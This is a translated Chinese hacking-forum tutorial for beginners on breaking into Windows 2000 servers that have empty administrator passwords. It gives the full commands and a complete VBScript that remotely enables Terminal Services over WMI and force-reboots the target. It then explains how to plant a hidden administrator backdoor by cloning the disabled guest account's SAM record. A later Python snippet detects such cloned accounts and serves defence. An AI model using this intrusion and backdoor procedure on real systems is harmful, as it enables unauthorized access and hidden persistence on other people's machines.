A simple 3389 intrusion walkthrough
Original author: caozhe (草哲)
Source: 中国欲网技术论坛 -- 草哲

I have seen many, many articles online that teach you how to break into this or that, and I think a newbie simply cannot follow them!

So I had an idea: write something simpler, aimed at newbies, and share what I have learned with everyone!
To do this, I suggest you work from a Windows 2000 machine.
First, you need tools. Let me recommend a few programs, the ones I use all the time:
for scanning, X-Scan V2.3, WINNTAutoAttack and Fluxay (流光)!
I rarely use X-Scan these days; mostly I use WINNTAutoAttack, and of course I often use Xiaorong's Fluxay as well.
Opening the terminal service remotely only needs one script; the code is in the second post. Save it as *.vbe (I saved mine as rots.vbe).
Cloning an account only needs psu.

OK. Say the scan found a server with a weak NT password: IP address 120.0.0.1, administrator account "administrator", empty password.
Run CMD (the DOS prompt under 2000) and enable the terminal service on it.
The command is:
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
The command above should be easy to read: cscript rots.vbe is the command, followed by the IP, then the administrator account, then the password. Because the administrator password on 120.0.0.1 is empty, a pair of double quotes stands for the empty password. After that comes the port; you can set the terminal port to anything you like. /fr is the reboot switch (forced reboot, which is what I normally use; you can also use /r, a normal reboot).

Because Terminal Services only exists on Windows 2000 Server and above (Server included), Professional will not do. This version of the script checks the server's edition and, if it is Professional, prompts you to abort the installation.

If all goes well, you can connect to the terminal after a while. We can ping it to see whether it has rebooted: ping 120.0.0.1 -t
After installation, connect to the terminal with a client. Now we clone an account, to make things convenient later on!
Back in DOS, we establish an IPC$ connection:
net use \\120.0.0.1\ipc$ "" /user:"administrator"
This command should be self-explanatory. Once it completes, upload psu to the target's winnt\system32 directory:
copy psu.exe \\120.0.0.1\admin$\system32
After the upload, start creating the backdoor account on the compromised box. Switch over to it!

Suppose the guest account is disabled; guest is exactly the account we will turn into the backdoor.
Run CMD on that server and, at the command line, type
psu -p regedit -i PID

To explain: the PID at the end is the process ID of the system process winlogon. Right-click the taskbar and open Task Manager,
go to the Processes tab, find the winlogon process; the number next to it is winlogon's PID. Suppose it is 5458.
Then the command is
psu -p regedit -i 5458
This opens the registry editor directly with the ability to read the local SAM.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
Under it is the local user information. What we want to do is clone the disabled guest into an account with administrator rights.
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
Look at the type of administrator: it is 1F4. Now look at guest: it is 1F5.
Good. Knowing the types, open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
double-click the F value on the right, copy the jumble of characters inside, then open
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
double-click the F value on the right and paste what you just copied into it!
When that is done, export these two keys:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
and HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
After exporting, delete both keys, then import them back in. Close the registry editor.

Open CMD and type at the command line
net user guest password
This command sets a password for guest; the trailing "password" is the password.
Then type
net user guest /active:y
This command activates the guest account. Then we disable it again:
net user guest /active:n
The three commands above must be run from DOS!

OK, done. Open Computer Management and look at the users: see, the guest account is still shown as disabled! Haha, but it already has administrator rights,
it does not show up in the Administrators group, and it can log on to the terminal exactly like the administrator account!

Log off and log on as guest!
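The clone described above leaves a tell-tale inconsistency: the Guest key is still named 000001F5, but the F record pasted into it carries Administrator's RID (0x1F4). The check below is an added defensive example, not code from the original post; it assumes the F value layout documented by common SAM parsers (RID as a DWORD at offset 0x30, account control flags as a WORD at 0x38) and runs over a constructed sample of user keys.

```python
import struct

# Offsets inside the "F" value of HKLM\SAM\SAM\Domains\Account\Users\<RID>,
# assumed here as documented by common SAM parsers (e.g. RegRipper samparse).
F_RID_OFFSET = 0x30        # DWORD: the RID this record was created for
F_ACB_FLAGS_OFFSET = 0x38  # WORD: account control bits
ACB_DISABLED = 0x0001      # what "net user <name> /active:n" sets
ACB_NORMAL = 0x0010        # ordinary user account

def parse_f_value(f_blob: bytes) -> dict:
    """Return the RID and disabled state stored inside an F record."""
    if len(f_blob) < F_ACB_FLAGS_OFFSET + 2:
        raise ValueError("F value too short to be a SAM user record")
    rid, = struct.unpack_from("<I", f_blob, F_RID_OFFSET)
    flags, = struct.unpack_from("<H", f_blob, F_ACB_FLAGS_OFFSET)
    return {"rid": rid, "disabled": bool(flags & ACB_DISABLED)}

def find_cloned_accounts(users: dict) -> list:
    """users maps each user key name (e.g. "000001F5") to its F bytes. A key
    whose embedded RID differs from its own name has had another account's
    F record pasted over it, which is exactly the clone trick."""
    findings = []
    for key_name, f_blob in users.items():
        rec = parse_f_value(f_blob)
        key_rid = int(key_name, 16)
        if rec["rid"] != key_rid:
            findings.append({"key": key_name, "key_rid": key_rid,
                             "embedded_rid": rec["rid"],
                             "disabled": rec["disabled"]})
    return findings

def make_f(rid: int, disabled: bool) -> bytes:
    """Constructed 80-byte F value; only the fields this check reads are set."""
    blob = bytearray(0x50)
    struct.pack_into("<I", blob, F_RID_OFFSET, rid)
    flags = ACB_NORMAL | (ACB_DISABLED if disabled else 0)
    struct.pack_into("<H", blob, F_ACB_FLAGS_OFFSET, flags)
    return bytes(blob)

# Constructed sample: Administrator untouched, Guest carrying Administrator's
# F record and disabled again, plus one ordinary local user.
SAMPLE_USERS = {
    "000001F4": make_f(0x1F4, False),
    "000001F5": make_f(0x1F4, True),
    "000003E8": make_f(0x3E8, False),
}

if __name__ == "__main__":
    for hit in find_cloned_accounts(SAMPLE_USERS):
        print(f"{hit['key']}: F claims RID 0x{hit['embedded_rid']:X}, "
              f"disabled={hit['disabled']} -> cloned account")
```

On a live machine the F values are readable only as SYSTEM from HKLM\SAM\SAM\Domains\Account\Users\<RID> (or from an offline copy of the SAM hive); pass them to find_cloned_accounts in the same dict form.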

Typing all this wore me out. It really was not easy! Haha, I hope everyone can follow the above!
If there is anything you still do not understand, you can ask me; whatever I know I will tell you!
Because I am a newbie myself and get carried away once I learn a little, haha! If anything here is wrong, experts please correct me!

----------------------------------------------------------------------
Below is the script for opening the terminal service. Save it as *.vbe
' ROTS: enables Terminal Services on a remote Windows 2000 Server through WMI
' (registry writes via StdRegProv), then optionally reboots the target.
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' If started with wscript.exe, re-launch under cscript in a console window
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    set objShell=wscript.createObject("wscript.shell")
    objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
    wscript.quit
end if
if wscript.arguments.count<3 then
    usage()
    wscript.echo "Not enough parameters."
    wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
    port=wscript.arguments(3)
else
    port=3389
end if
if not isnumeric(port) then
    wscript.echo "The number of port is error."
    wscript.quit
end if
port=clng(port)    ' arguments arrive as strings; compare and store as a number
if port<1 or port>65000 then
    wscript.echo "The number of port is error."
    wscript.quit
end if
if wscript.arguments.count>4 then
    reboot=wscript.arguments(4)
else
    reboot=""
end if

usage()
outstreem.write "Connecting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
' 23 = wbemPrivilegeRemoteShutdown, 18 = wbemPrivilegeShutdown; needed for Win32Shutdown
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
    if instr(objinstoscaption.caption,"Server")>0 then
        wscript.echo "OK!"
    else
        wscript.echo "OS type is "&objinstoscaption.caption
        outstreem.write "Do you want to cancel setup?[y/n]"
        strcancel=instreem.readline
        if lcase(strcancel)<>"n" then wscript.quit
    end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
    .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
    .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
    .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
    .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
    .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
    .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = forced reboot (4 = force, 2 = reboot)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
    outstreem.write "Now, reboot target...."
    strwqlquery="select * from win32_operatingsystem where primary='true'"
    set colinstances=objswbemservices.execquery(strwqlquery)
    for each objinstance in colinstances
        objinstance.win32shutdown(flag)
    next
    showerror(err.number)
else
    wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

' Print the last WMI error and exit, or "OK!" when there was none
function showerror(errornumber)
    if errornumber Then
        wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
        if err.description <> "" then
            wscript.echo "Error description: "&err.description&"."
        end if
        wscript.quit
    else
        wscript.echo "OK!"
    end if
end function

function usage()
    wscript.echo string(79,"*")
    wscript.echo "ROTS v1.05"
    wscript.echo "Remote Open Terminal services Script, by 草哲"
    wscript.echo "Welcome to visit www.5458.net"
    wscript.echo "Usage:"
    wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
    wscript.echo "port: default number is 3389."
    wscript.echo "/r: auto reboot target."
    wscript.echo "/fr: auto force reboot target."
    wscript.echo string(79,"*")&vbcrlf
end function
Reposted from 安全焦点 (XFocus)